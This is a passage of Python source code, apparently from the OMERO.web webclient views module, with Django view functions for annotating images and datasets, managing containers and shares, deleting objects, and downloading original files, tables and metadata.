groupIds.add(o.getDetails().group.id.val)
if not o.canAnnotate():
annotationBlocked = (
"Can't add annotations because you don't" " have permissions"
)
obj_labels.append({"type": key.title(), "id": o.id, "name": o.getName()})
obj_string = "&".join(obj_ids)
link_string = "|".join(obj_ids).replace("=", "-")
if len(groupIds) == 0:
# No supported objects found.
# If multiple tags / tagsets selected, return placeholder
if (
len(request.GET.getlist("tag")) > 0
or len(request.GET.getlist("tagset")) > 0
):
return HttpResponse("<h2>Can't batch annotate tags</h2>")
else:
return handlerInternalError(request, "No objects found")
groupId = list(groupIds)[0]
conn.SERVICE_OPTS.setOmeroGroup(groupId)
manager = BaseContainer(conn)
figScripts = manager.listFigureScripts(objs)
canExportAsJpg = manager.canExportAsJpg(request, objs)
filesetInfo = None
iids = []
if "image" in objs and len(objs["image"]) > 0:
iids = [i.getId() for i in objs["image"]]
if len(iids) > 0:
filesetInfo = conn.getFilesetFilesInfo(iids)
archivedInfo = conn.getArchivedFilesInfo(iids)
filesetInfo["count"] += archivedInfo["count"]
filesetInfo["size"] += archivedInfo["size"]
context = {
"iids": iids,
"obj_string": obj_string,
"link_string": link_string,
"obj_labels": obj_labels,
"batch_ann": True,
"figScripts": figScripts,
"canExportAsJpg": canExportAsJpg,
"filesetInfo": filesetInfo,
"annotationBlocked": annotationBlocked,
"differentGroups": False,
}
if len(groupIds) > 1:
context["annotationBlocked"] = (
"Can't add annotations because" " objects are in different groups"
)
context["differentGroups"] = True # E.g. don't run scripts etc
context["canDownload"] = manager.canDownload(objs)
context["template"] = "webclient/annotations/batch_annotate.html"
context["webclient_path"] = reverse("webindex")
context["annotationCounts"] = manager.getBatchAnnotationCounts(
getObjects(request, conn)
)
return context
@login_required()
@render_response()
def annotate_file(request, conn=None, **kwargs):
"""
On 'POST', This handles attaching an existing file-annotation(s) and/or
upload of a new file to one or more objects
Otherwise it generates the form for choosing file-annotations & local
files.
"""
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
# Use the first object we find to set context (assume all objects are in
# same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
obj_count = sum([len(selected[types]) for types in selected])
if obj_count == 0:
raise Http404("Need to specify objects via e.g. ?image=1")
# Get appropriate manager, either to list available Files to add to single
# object, or list ALL Files (multiple objects)
manager = None
if obj_count == 1:
for t in selected:
if len(selected[t]) > 0:
o_type = t[:-1] # "images" -> "image"
o_id = selected[t][0]
break
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
if o_type == "tagset":
# TODO: this should be handled by the BaseContainer
o_type = "tag"
kw = {}
if o_type is not None and int(o_id) > 0:
kw[str(o_type)] = int(o_id)
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
if manager is not None:
files = manager.getFilesByObject()
else:
manager = BaseContainer(conn)
for dtype, objs in oids.items():
if len(objs) > 0:
# NB: we only support a single data-type now. E.g. 'image' OR
# 'dataset' etc.
files = manager.getFilesByObject(
parent_type=dtype, parent_ids=[o.getId() for o in objs]
)
break
initial["files"] = files
if request.method == "POST":
# handle form submission
form_file = FilesAnnotationForm(initial=initial, data=request.POST.copy())
if form_file.is_valid():
# Link existing files...
files = form_file.cleaned_data["files"]
added_files = []
if files is not None and len(files) > 0:
added_files = manager.createAnnotationsLinks("file", files, oids)
# upload new file
fileupload = (
"annotation_file" in request.FILES
and request.FILES["annotation_file"]
or None
)
if fileupload is not None and fileupload != "":
newFileId = manager.createFileAnnotations(fileupload, oids)
added_files.append(newFileId)
return JsonResponse({"fileIds": added_files})
else:
return HttpResponse(form_file.errors)
else:
form_file = FilesAnnotationForm(initial=initial)
context = {"form_file": form_file}
template = "webclient/annotations/files_form.html"
context["template"] = template
return context
@login_required()
@render_response()
def annotate_rating(request, conn=None, **kwargs):
"""
Handle adding Rating to one or more objects
"""
if request.method != "POST":
raise Http404("Only POST supported")
rating = getIntOrDefault(request, "rating", 0)
oids = getObjects(request, conn)
# add / update rating
for otype, objs in oids.items():
for o in objs:
o.setRating(rating)
# return a summary of ratings
return JsonResponse({"success": True})
@login_required()
@render_response()
def annotate_comment(request, conn=None, **kwargs):
"""Handle adding Comments to one or more objects
Unbound instance of Comment form not available.
If the form has been submitted, a bound instance of the form
is created using request.POST"""
if request.method != "POST":
raise Http404("Unbound instance of form not available.")
oids = getObjects(request, conn)
selected = getIds(request)
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
"shares": oids["share"],
}
# Use the first object we find to set context (assume all objects are in
# same group!) this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Handle form submission...
form_multi = CommentAnnotationForm(initial=initial, data=request.POST.copy())
if form_multi.is_valid():
# In each case below, we pass the {'object_type': [ids]} map
content = form_multi.cleaned_data["comment"]
if content is not None and content != "":
if oids["share"] is not None and len(oids["share"]) > 0:
sid = oids["share"][0].id
manager = BaseShare(conn, sid)
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
textAnn = manager.addComment(host, content)
# For shares we need to return html for display...
context = {
"tann": textAnn,
"added_by": conn.getUserId(),
"template": "webclient/annotations/comment.html",
}
else:
# ...otherwise Comments are re-loaded by AJAX json
# so we don't *need* to return anything
manager = BaseContainer(conn)
annId = manager.createCommentAnnotations(content, oids)
context = {"annId": annId, "added_by": conn.getUserId()}
return context
else:
# TODO: handle invalid form error
return HttpResponse(str(form_multi.errors))
@login_required()
@render_response()
def annotate_map(request, conn=None, **kwargs):
"""
Handle adding Map Annotations to one or more objects
POST data "mapAnnotation" should be list of ['key':'value'] pairs.
"""
if request.method != "POST":
raise Http404(
"Need to POST map annotation data as list of" " ['key', 'value'] pairs"
)
oids = getObjects(request, conn)
# Use the first object we find to set context (assume all objects are in
# same group!)
# this does not aplly to share
if len(oids["share"]) < 1:
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
data = request.POST.get("mapAnnotation")
data = json.loads(data)
annIds = request.POST.getlist("annId")
ns = request.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
# Create a new annotation
if len(annIds) == 0 and len(data) > 0:
duplicate = request.POST.get("duplicate", "false")
duplicate.lower() == "true"
# For 'client' map annotations, we enforce 1 annotation per object
if ns == omero.constants.metadata.NSCLIENTMAPANNOTATION:
duplicate = True
if duplicate:
# Create a new Map Annotation for each object:
for k, objs in oids.items():
for obj in objs:
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
obj.linkAnnotation(ann)
else:
# Create single Map Annotation and link to all objects
ann = omero.gateway.MapAnnotationWrapper(conn)
ann.setValue(data)
ann.setNs(ns)
ann.save()
annIds.append(ann.getId())
for k, objs in oids.items():
for obj in objs:
obj.linkAnnotation(ann)
# Or update existing annotations
else:
for annId in annIds:
ann = conn.getObject("MapAnnotation", annId)
if ann is None:
continue
if len(data) > 0:
ann.setValue(data)
ann.save()
else:
# Delete if no data
handle = conn.deleteObjects("/Annotation", [annId])
try:
conn._waitOnCmd(handle)
finally:
handle.close()
if len(data) == 0:
annIds = None
return {"annId": annIds}
@login_required()
@render_response()
def marshal_tagging_form_data(request, conn=None, **kwargs):
"""
Provides json data to ome.tagging_form.js
"""
group = get_long_or_default(request, "group", -1)
conn.SERVICE_OPTS.setOmeroGroup(str(group))
try:
offset = int(request.GET.get("offset"))
limit = int(request.GET.get("limit", 1000))
except Exception:
offset = limit = None
jsonmode = request.GET.get("jsonmode")
if jsonmode == "tagcount":
tag_count = conn.getTagCount()
return dict(tag_count=tag_count)
manager = BaseContainer(conn)
manager.loadTagsRecursive(eid=-1, offset=offset, limit=limit)
all_tags = manager.tags_recursive
all_tags_owners = manager.tags_recursive_owners
if jsonmode == "tags":
# send tag information without descriptions
r = list((i, t, o, s) for i, d, t, o, s in all_tags)
return r
elif jsonmode == "desc":
# send descriptions for tags
return dict((i, d) for i, d, t, o, s in all_tags)
elif jsonmode == "owners":
# send owner information
return all_tags_owners
return HttpResponse()
@login_required()
@render_response()
def annotate_tags(request, conn=None, **kwargs):
"""
This handles creation AND submission of Tags form, adding new AND/OR
existing tags to one or more objects
"""
oids = getObjects(request, conn)
selected = getIds(request)
obj_count = sum([len(selected[types]) for types in selected])
# Get appropriate manager, either to list available Tags to add to single
# object, or list ALL Tags (multiple objects)
manager = None
self_id = conn.getEventContext().userId
tags = []
# Use the first object we find to set context (assume all objects are
# in same group!)
for obs in oids.values():
if len(obs) > 0:
conn.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
break
# Make a list of all current tags
# As would be on right column of tagging dialog...
taglist, users = tree.marshal_annotations(
conn,
project_ids=selected["projects"],
dataset_ids=selected["datasets"],
image_ids=selected["images"],
screen_ids=selected["screens"],
plate_ids=selected["plates"],
run_ids=selected["acquisitions"],
well_ids=selected["wells"],
ann_type="tag",
# If we reach this limit we'll get some tags not removed
limit=ANNOTATIONS_LIMIT,
)
userMap = {}
for exp in users:
userMap[exp["id"]] = exp
# For batch annotate, only include tags that user has added to all objects
if obj_count > 1:
# count my links
myLinkCount = {}
for t in taglist:
tid = t["id"]
if tid not in myLinkCount:
myLinkCount[tid] = 0
if t["link"]["owner"]["id"] == self_id:
myLinkCount[tid] += 1
# filter
taglist = [t for t in taglist if myLinkCount[t["id"]] == obj_count]
selected_tags = []
for tag in taglist:
linkOwnerId = tag["link"]["owner"]["id"]
owner = userMap[linkOwnerId]
ownerName = "%s %s" % (owner["firstName"], owner["lastName"])
canDelete = True
created = tag["link"]["date"]
linkOwned = linkOwnerId == self_id
selected_tags.append(
(tag["id"], self_id, ownerName, canDelete, created, linkOwned)
)
# selected_tags is really a list of tag LINKS.
# May be several links per tag.id
selected_tags.sort(key=lambda x: x[0])
initial = {
"selected": selected,
"images": oids["image"],
"datasets": oids["dataset"],
"projects": oids["project"],
"screens": oids["screen"],
"plates": oids["plate"],
"acquisitions": oids["acquisition"],
"wells": oids["well"],
}
if request.method == "POST":
# handle form submission
form_tags = TagsAnnotationForm(initial=initial, data=request.POST.copy())
newtags_formset = NewTagsAnnotationFormSet(
prefix="newtags", data=request.POST.copy()
)
# Create new tags or Link existing tags...
if form_tags.is_valid() and newtags_formset.is_valid():
# filter down previously selected tags to the ones linked by
# current user
selected_tag_ids = [stag[0] for stag in selected_tags if stag[5]]
# Remove duplicates from tag IDs
selected_tag_ids = list(set(selected_tag_ids))
post_tags = list(form_tags.cleaned_data["tags"])
tags = [tag for tag in post_tags if tag not in selected_tag_ids]
removed = [tag for tag in selected_tag_ids if tag not in post_tags]
manager = BaseContainer(conn)
if tags:
manager.createAnnotationsLinks("tag", tags, oids)
new_tags = []
for form in newtags_formset.forms:
new_tags.append(
manager.createTagAnnotations(
form.cleaned_data["tag"],
form.cleaned_data["description"],
oids,
tag_group_id=form.cleaned_data["tagset"],
)
)
# only remove Tags where the link is owned by self_id
for remove in removed:
tag_manager = BaseContainer(conn, tag=remove)
tag_manager.remove(
[
"%s-%s" % (dtype, obj.id)
for dtype, objs in oids.items()
for obj in objs
],
tag_owner_id=self_id,
)
return JsonResponse({"added": tags, "removed": removed, "new": new_tags})
else:
# TODO: handle invalid form error
return HttpResponse(str(form_tags.errors))
else:
form_tags = TagsAnnotationForm(initial=initial)
newtags_formset = NewTagsAnnotationFormSet(prefix="newtags")
context = {
"form_tags": form_tags,
"newtags_formset": newtags_formset,
"selected_tags": selected_tags,
}
template = "webclient/annotations/tags_form.html"
context["template"] = template
return context
@require_POST
@login_required()
@render_response()
def edit_channel_names(request, imageId, conn=None, **kwargs):
"""
Edit and save channel names
"""
image = conn.getObject("Image", imageId)
sizeC = image.getSizeC()
channelNames = {}
nameDict = {}
for i in range(sizeC):
cname = request.POST.get("channel%d" % i, None)
if cname is not None:
cname = smart_str(cname)[:255] # Truncate to fit in DB
channelNames["channel%d" % i] = cname
nameDict[i + 1] = cname
# If the 'Apply to Dataset' button was used to submit...
if request.POST.get("confirm_apply", None) is not None:
# plate-123 OR dataset-234
parentId = request.POST.get("parentId", None)
if parentId is not None:
ptype = parentId.split("-")[0].title()
pid = long(parentId.split("-")[1])
counts = conn.setChannelNames(ptype, [pid], nameDict, channelCount=sizeC)
else:
counts = conn.setChannelNames("Image", [image.getId()], nameDict)
rv = {"channelNames": channelNames}
if counts:
rv["imageCount"] = counts["imageCount"]
rv["updateCount"] = counts["updateCount"]
return rv
else:
return {"error": "No parent found to apply Channel Names"}
@login_required(setGroupContext=True)
@render_response()
def manage_action_containers(
request, action, o_type=None, o_id=None, conn=None, **kwargs
):
"""
Handles many different actions on various objects.
@param action: "addnewcontainer", (creates a new Project, Dataset,
Screen), "editname", "savename", "editdescription",
"savedescription", (used as GET and POST for in-line
editing),
"removefromshare", (tree P/D/I moving etc)
"delete", "deletemany" (delete objects)
"remove" (remove tag/comment from object)
@param o_type: "dataset", "project", "image", "screen", "plate",
"acquisition", "well","comment", "file", "tag",
"tagset","share", "sharecomment"
"""
template = None
manager = None
if o_type in (
"dataset",
"project",
"image",
"screen",
"plate",
"acquisition",
"well",
"comment",
"file",
"tag",
"tagset",
):
kw = {}
if o_type is not None and int(o_id) > 0:
o_id = int(o_id)
kw[str(o_type)] = o_id
try:
manager = BaseContainer(conn, **kw)
except AttributeError as x:
return handlerInternalError(request, x)
elif o_type in ("share", "sharecomment", "chat"):
manager = BaseShare(conn, o_id)
else:
manager = BaseContainer(conn)
form = None
if action == "addnewcontainer":
# Used within the jsTree to add a new Project, Dataset, Tag,
# Tagset etc under a specified parent OR top-level
if not request.method == "POST":
return JsonResponse(
{"Error": "Must use POST to create container"}, status=405
)
form = ContainerForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Create new in %s: %s" % (o_type, str(form.cleaned_data)))
name = form.cleaned_data["name"]
description = form.cleaned_data["description"]
owner = form.cleaned_data["owner"]
if o_type == "project" and hasattr(manager, o_type) and o_id > 0:
oid = manager.createDataset(name, description, owner=owner)
elif o_type == "tagset" and o_id > 0:
oid = manager.createTag(name, description, owner=owner)
elif request.POST.get("folder_type") in (
"project",
"screen",
"dataset",
"tag",
"tagset",
):
# No parent specified. We can create orphaned 'project',
# 'dataset' etc.
folder_type = request.POST.get("folder_type")
if folder_type == "dataset":
oid = manager.createDataset(
name,
description,
owner=owner,
img_ids=request.POST.getlist("image", None),
)
else:
oid = conn.createContainer(
folder_type, name, description, owner=owner
)
else:
return HttpResponseServerError("Object does not exist")
rdict = {"bad": "false", "id": oid}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
elif action == "edit":
# form for editing Shares only
if o_id is None:
raise Http404("No share ID")
if o_type == "share" and int(o_id) > 0:
template = "webclient/public/share_form.html"
manager.getMembers(o_id)
manager.getComments(o_id)
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
initial = {
"message": manager.share.message,
"expiration": "",
"shareMembers": manager.membersInShare,
"enable": manager.share.active,
"experimenters": experimenters,
}
if manager.share.getExpireDate() is not None:
initial["expiration"] = manager.share.getExpireDate().strftime(
"%Y-%m-%d"
)
form = ShareForm(initial=initial) # 'guests':share.guestsInShare,
context = {"manager": manager, "form": form}
elif action == "save":
# Handles submission of the 'edit' form above. TODO: not used now?
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if o_type == "share":
experimenters = list(conn.getExperimenters())
experimenters.sort(key=lambda x: x.getOmeName().lower())
form = ShareForm(
initial={"experimenters": experimenters}, data=request.POST.copy()
)
if form.is_valid():
logger.debug("Update share: %s" % (str(form.cleaned_data)))
message = form.cleaned_data["message"]
expiration = form.cleaned_data["expiration"]
members = form.cleaned_data["members"]
# guests = request.POST['guests']
enable = form.cleaned_data["enable"]
host = "%s?server=%i" % (
request.build_absolute_uri(
reverse("load_template", args=["public"])
),
int(conn.server_id),
)
manager.updateShareOrDiscussion(
host, message, members, enable, expiration
)
r = "enable" if enable else "disable"
return HttpResponse(r)
else:
template = "webclient/public/share_form.html"
context = {"share": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "editname":
# start editing 'name' in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
if o_type == "tag":
txtValue = obj.textValue
else:
txtValue = obj.getName()
form = ContainerNameForm(initial={"name": txtValue})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savename":
# Save name edit in-line
if not request.method == "POST":
return HttpResponseRedirect(
reverse("manage_action_containers", args=["edit", o_type, o_id])
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerNameForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
name = form.cleaned_data["name"]
rdict = {"bad": "false", "o_type": o_type}
manager.updateName(o_type, name)
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "editdescription":
# start editing description in-line
if hasattr(manager, o_type) and o_id > 0:
obj = getattr(manager, o_type)
template = "webclient/ajax_form/container_form_ajax.html"
form = ContainerDescriptionForm(initial={"description": obj.description})
context = {"manager": manager, "form": form}
else:
return HttpResponseServerError("Object does not exist")
elif action == "savedescription":
# Save editing of description in-line
if not request.method == "POST":
return HttpResponseServerError(
"Action '%s' on the '%s' id:%s cannot be complited"
% (action, o_type, o_id)
)
if hasattr(manager, o_type) and o_id > 0:
form = ContainerDescriptionForm(data=request.POST.copy())
if form.is_valid():
logger.debug("Update name form:" + str(form.cleaned_data))
description = form.cleaned_data["description"]
manager.updateDescription(o_type, description)
rdict = {"bad": "false"}
return JsonResponse(rdict)
else:
d = dict()
for e in form.errors.items():
d.update({e[0]: unicode(e[1])})
rdict = {"bad": "true", "errs": d}
return JsonResponse(rdict)
else:
return HttpResponseServerError("Object does not exist")
elif action == "remove":
# Handles removal of comment, tag from
# Object etc.
# E.g. image-123 or image-1|image-2
parents = request.POST["parent"]
try:
manager.remove(parents.split("|"))
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "removefromshare":
image_id = request.POST.get("source")
try:
manager.removeImage(image_id)
except Exception as x:
logger.error(traceback.format_exc())
rdict = {"bad": "true", "errs": str(x)}
return JsonResponse(rdict)
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "delete":
# Handles delete of a file attached to object.
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
try:
handle = manager.deleteItem(child, anns)
request.session["callback"][str(handle)] = {
"job_type": "delete",
"delmany": False,
"did": o_id,
"dtype": o_type,
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"start_time": datetime.datetime.now(),
}
request.session.modified = True
except Exception as x:
logger.error(
"Failed to delete: %r" % {"did": o_id, "dtype": o_type}, exc_info=True
)
rdict = {"bad": "true", "errs": str(x)}
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
elif action == "deletemany":
# Handles multi-delete from jsTree.
object_ids = {
"Image": request.POST.getlist("image"),
"Dataset": request.POST.getlist("dataset"),
"Project": request.POST.getlist("project"),
"Annotation": request.POST.getlist("tag"),
"Screen": request.POST.getlist("screen"),
"Plate": request.POST.getlist("plate"),
"Well": request.POST.getlist("well"),
"PlateAcquisition": request.POST.getlist("acquisition"),
}
child = toBoolean(request.POST.get("child"))
anns = toBoolean(request.POST.get("anns"))
logger.debug(
"Delete many: child? %s anns? %s object_ids %s" % (child, anns, object_ids)
)
try:
for key, ids in object_ids.items():
if ids is not None and len(ids) > 0:
handle = manager.deleteObjects(key, ids, child, anns)
if key == "PlateAcquisition":
key = "Plate Run" # for nicer user message
dMap = {
"job_type": "delete",
"start_time": datetime.datetime.now(),
"status": "in progress",
"error": 0,
"dreport": _formatReport(handle),
"dtype": key,
}
if len(ids) > 1:
dMap["delmany"] = len(ids)
dMap["did"] = ids
else:
dMap["delmany"] = False
dMap["did"] = ids[0]
request.session["callback"][str(handle)] = dMap
request.session.modified = True
except Exception:
logger.error(
"Failed to delete: %r" % {"did": ids, "dtype": key}, exc_info=True
)
# Ajax error handling will allow user to submit bug report
raise
else:
rdict = {"bad": "false"}
return JsonResponse(rdict)
context["template"] = template
return context
@login_required(doConnectionCleanup=False)
def get_original_file(request, fileId, download=False, conn=None, **kwargs):
"""
Returns the specified original file as an http response. Used for
displaying text or png/jpeg etc files in browser
"""
# May be viewing results of a script run in a different group.
conn.SERVICE_OPTS.setOmeroGroup(-1)
orig_file = conn.getObject("OriginalFile", fileId)
if orig_file is None:
return handlerInternalError(
request, "Original File does not exist (id:%s)." % (fileId)
)
rsp = ConnCleaningHttpResponse(orig_file.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
mimetype = orig_file.mimetype
if mimetype == "text/x-python":
mimetype = "text/plain" # allows display in browser
rsp["Content-Type"] = mimetype
rsp["Content-Length"] = orig_file.getSize()
if download:
downloadName = orig_file.name.replace(" ", "_")
downloadName = downloadName.replace(",", ".")
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
@login_required(doConnectionCleanup=False)
@render_response()
def omero_table(request, file_id, mtype=None, conn=None, **kwargs):
"""
Download OMERO.table as CSV (streaming response) or return as HTML or json
Request parameters:
header: 'false' excludes the column names row if mtype is 'csv'
offset: table rows offset for pagination
limit: table rows limit for pagination
query: OMERO.table query for filtering rows
@param file_id: OriginalFile ID
@param mtype: None for html table or 'csv' or 'json'
@param conn: BlitzGateway connection
"""
query = request.GET.get("query", "*")
offset = get_long_or_default(request, "offset", 0)
limit = get_long_or_default(request, "limit", settings.PAGE)
iviewer_url = None
try:
iviewer_url = reverse("omero_iviewer_index")
except NoReverseMatch:
pass
# Check if file exists since _table_query() doesn't check
file_id = long(file_id)
orig_file = conn.getObject("OriginalFile", file_id)
if orig_file is None:
raise Http404("OriginalFile %s not found" % file_id)
lazy = mtype == "csv"
context = webgateway_views._table_query(
request, file_id, conn=conn, query=query, offset=offset, limit=limit, lazy=lazy
)
if context.get("error") or not context.get("data"):
return JsonResponse(context)
# OR, return as csv or html
if mtype == "csv":
table_data = context.get("data")
hide_header = request.GET.get("header") == "false"
def csv_gen():
if not hide_header:
csv_cols = ",".join(table_data.get("columns"))
yield csv_cols
for rows in table_data.get("lazy_rows"):
yield (
"\n" + "\n".join([",".join([str(d) for d in row]) for row in rows])
)
downloadName = orig_file.name.replace(" ", "_").replace(",", ".")
downloadName = downloadName + ".csv"
rsp = TableClosingHttpResponse(csv_gen(), content_type="text/csv")
rsp.conn = conn
rsp.table = context.get("table")
rsp["Content-Type"] = "application/force-download"
# rsp['Content-Length'] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % downloadName
return rsp
context["data"]["name"] = orig_file.name
context["data"]["path"] = orig_file.path
context["data"]["id"] = file_id
context["meta"]["query"] = query
# check if offset matches an integer page number:
if offset == 0 or offset / limit == offset // limit:
context["meta"]["page"] = (offset // limit) + 1 if offset > 0 else 1
# pagination links
url = reverse("omero_table", args=[file_id])
context["meta"]["url"] = url
url += "?limit=%s" % limit
if query != "*":
url += "&query=%s" % query
if (offset + limit) < context["meta"]["totalCount"]:
context["meta"]["next"] = url + "&offset=%s" % (offset + limit)
if offset > 0:
context["meta"]["prev"] = url + "&offset=%s" % (max(0, offset - limit))
# by default, return context as JSON data
if mtype is None:
context["template"] = "webclient/annotations/omero_table.html"
context["iviewer_url"] = iviewer_url
col_types = context["data"]["column_types"]
if "ImageColumn" in col_types:
context["image_column_index"] = col_types.index("ImageColumn")
if "WellColumn" in col_types:
context["well_column_index"] = col_types.index("WellColumn")
if "RoiColumn" in col_types:
context["roi_column_index"] = col_types.index("RoiColumn")
# we don't use ShapeColumn type - just check name and LongColumn type...
# TODO: when ShapeColumn is supported, add handling to this code
cnames = [n.lower() for n in context["data"]["columns"]]
if "shape" in cnames and col_types[cnames.index("shape")] == "LongColumn":
context["shape_column_index"] = cnames.index("shape")
# provide example queries - pick first DoubleColumn...
for idx, c_type in enumerate(col_types):
if c_type in ("DoubleColumn", "LongColumn"):
col_name = context["data"]["columns"][idx]
# find first few non-empty cells...
vals = []
for row in context["data"]["rows"]:
if row[idx]:
vals.append(row[idx])
if len(vals) > 3:
break
if " " in col_name or len(vals) < 2:
# Don't support queries on columns with spaces
continue
context["example_column"] = col_name
context["example_min_value"] = min(vals)
context["example_max_value"] = max(vals)
break
return context
@login_required(doConnectionCleanup=False)
def download_annotation(request, annId, conn=None, **kwargs):
"""Returns the file annotation as an http response for download"""
ann = conn.getObject("FileAnnotation", annId)
if ann is None:
return handlerInternalError(
request, "FileAnnotation does not exist (id:%s)." % (annId)
)
rsp = ConnCleaningHttpResponse(ann.getFileInChunks(buf=settings.CHUNK_SIZE))
rsp.conn = conn
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = ann.getFileSize()
rsp["Content-Disposition"] = "attachment; filename=%s" % (
ann.getFileName().replace(" ", "_")
)
return rsp
@login_required()
def download_orig_metadata(request, imageId, conn=None, **kwargs):
"""Downloads the 'Original Metadata' as a text file"""
image = conn.getObject("Image", imageId)
if image is None:
raise Http404("No Image found with ID %s" % imageId)
om = image.loadOriginalMetadata()
txtLines = ["[Global Metadata]"]
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[1]])
txtLines.append("[Series Metadata]")
txtLines.extend(["%s=%s" % (kv[0], kv[1]) for kv in om[2]])
rspText = "\n".join(txtLines)
rsp = HttpResponse(rspText)
rsp["Content-Type"] = "application/force-download"
rsp["Content-Length"] = len(rspText)
rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
return rsp
@login_required()
@render_response()
def download_placeholder(request, conn=None, **kwargs):
"""
Page displays a simple "Preparing download..." message and redirects to
the 'url'.
We construct the url and query string from request: 'url' and 'ids'.
"""
format = request.GET.get("format", None)
if format is not None:
download_url = reverse("download_as")
zipName = "Export_as_%s" % format
else:
download_url = reverse("archived_files")
zipName = "OriginalFileDownload"
targetIds = request.GET.get("ids") # E.g. image-1|image-2
defaultName = request.GET.get("name", zipName) # default zip name
defaultName = os.path.basename(defaultName) # remove path
if targetIds is None:
raise Http404("No IDs specified. E.g. ?ids=image-1|image-2")
ids = targetIds.split("|")
fileLists = []
fileCount = 0
filesTotalSize = 0
# If we're downloading originals, list original files so user can
# download individual files.
if format is None:
imgIds = []
wellIds = []
for i in ids:
if i.split("-")[0] == "image":
imgIds.append(i.split("-")[1])
elif i.split("-")[0] == "well":
wellIds.append(i.split("-")[1])
images = []
# Get images...
if imgIds:
images = list(conn.getObjects("Image", imgIds))
if len(images) == 0:
raise Http404("No images found.")
# Have a list of files per fileset (or per image without fileset)
fsIds = set()
fileIds = set()
for image in images:
fs = image.getFileset()
if fs is not None:
# Make sure we've not processed this fileset before.
if fs.id in fsIds:
continue
fsIds.add(fs.id)
files = list(image.getImportedImageFiles())
fList = []
for f in files:
if f.id in fileIds:
continue
fileIds.add(f.id)
fList.append({"id": f.id, "name": f.name, "size": f.getSize()})
filesTotalSize += f.getSize()
if len(fList) > 0:
fileLists.append(fList)
fileCount = sum([len(fList) for fList in fileLists])
else:
# E.g. JPEG/PNG - 1 file per image
fileCount = len(ids)
query = "&".join([_id.replace("-", "=") for _id in ids])
download_url = download_url + "?" + query
if format is not None:
download_url = download_url + "&format=%s" % format
context = {
"template": "webclient/annotations/download_placeholder.html",
"url": download_url,
"defaultName": defaultName,
"fileLists": fileLists,
"fileCount": fileCount,
"filesTotalSize": filesTotalSize,
}
if filesTotalSize > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
context["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
return context
@login_required(setGroupContext=True)
@render_response()
def load_calendar(request, year=None, month=None, conn=None, **kwargs):
"""
Loads the calendar which is displayed in the left panel of the history
page.
Shows current month by default. Filter by experimenter
"""
template = "webclient/history/calendar.html"
filter_user_id = request.session.get("user_id")
if year is not None and month is not None:
controller = BaseCalendar(conn=conn, year=year, month=month, eid=filter_user_id)
else:
today = datetime.datetime.today()
controller = BaseCalendar(
conn=conn, year=today.year, month=today.month, eid=filter_user_id
)
controller.create_calendar()
context = {"controller": controller}
context["template"] = template
return context
@login_required(setGroupContext=True)
@render_response()
def load_history(request, year, month, day, conn=None, **kwargs):
"""The data for a particular date that is loaded into the center panel"""
if year is None or month is None or day is None:
raise Http404("Year, month, and day are required")
template = "webclient/history/history_details.html"
# get page
page = int(request.GET.get("page", 1))
filter_user_id = request.session.get("user_id")
controller = BaseCalendar(
conn=conn, year=year, month=month, day=day, eid=filter_user_id
)
controller.get_items(page)
context = {"controller": controller}
context["template"] = template
return context
def getObjectUrl(conn, obj):
"""
This provides a url to browse to the specified omero.model.ObjectI P/D/I,
